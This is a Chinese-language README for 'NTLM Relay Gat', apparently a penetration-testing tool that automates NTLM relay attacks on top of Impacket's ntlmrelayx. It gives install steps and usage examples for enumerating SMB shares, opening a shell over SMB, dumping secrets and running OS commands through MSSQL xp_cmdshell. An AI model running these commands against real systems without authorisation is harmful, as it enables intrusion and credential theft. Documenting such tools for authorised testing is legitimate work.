
NTLM Relay Gat 是一款强大的工具,旨在利用 Impacket 工具套件中的 ntlmrelayx.py 来自动化执行 NTLM 中继攻击。通过利用 ntlmrelayx.py 的功能,NTLM Relay Gat 简化了利用 NTLM 中继漏洞的过程,提供了从列出 SMB 共享到在 MSSQL 数据库上执行命令等一系列功能。
在开始之前,请确保满足以下要求:
proxychains 已正确配置,使用 ntlmrelayx 的 SOCKS 中继端口要安装 NTLM Relay Gat,请执行以下步骤:
确保系统上安装了 Python 3.6 或更高版本。
克隆 NTLM Relay Gat 仓库:
git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
pip install -r requirements.txt
现在 NTLM Relay Gat 已安装完毕,可以使用了。
要使用 NTLM Relay Gat,请确保在 ntlmrelayx.py 的 socks 命令输出中具有中继会话,并且已将 proxychains 配置为使用 ntlmrelayx.py 的代理。然后使用所需选项执行脚本。以下是运行 NTLM Relay Gat 的一些示例:
# 使用 10 个线程列出可用的 SMB 共享
python ntlm_relay_gat.py --smb-shares -t 10
# 通过 SMB 执行 shell
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell
# 从目标转储秘密
python ntlm_relay_gat.py --dump-secrets
# 列出可用的 MSSQL 数据库
python ntlm_relay_gat.py --mssql-dbs
# 通过 xp_cmdshell 执行操作系统命令
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'
NTLM Relay Gat 仅供教育和合法的渗透测试使用。在未获得事先双方同意的情况下,使用 NTLM Relay Gat 攻击目标是违法的。NTLM Relay Gat 的开发者不承担任何责任,并且不对因使用本工具而产生的任何滥用或损害负责。
本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。